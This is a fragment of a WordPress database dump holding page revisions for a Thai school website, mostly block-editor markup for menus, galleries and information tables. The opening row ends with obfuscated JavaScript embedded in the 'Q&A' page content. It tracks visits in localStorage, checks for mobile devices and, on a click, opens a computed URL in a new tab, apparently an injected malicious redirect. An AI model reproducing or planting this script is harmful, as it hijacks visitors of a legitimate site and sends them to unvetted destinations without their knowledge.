_0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','กระทู้ ถาม-ตอบ ทั้งหมด','','inherit','closed','closed','','349-revision-v1','','','2024-08-01 10:59:12','2024-08-01 03:59:12','',349,'http://pakhaeng.ssk.in.th/?p=350',0,'revision','',0),
(354,1,'2024-08-01 11:02:19','2024-08-01 04:02:19','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder\\u0026p=328\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"author\":[],\"offset\":\"0\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#2d27a1\",\"headingHoverBgColor\":\"#abb8c3\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#0693e3\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#8ed1fc\",\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=337\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 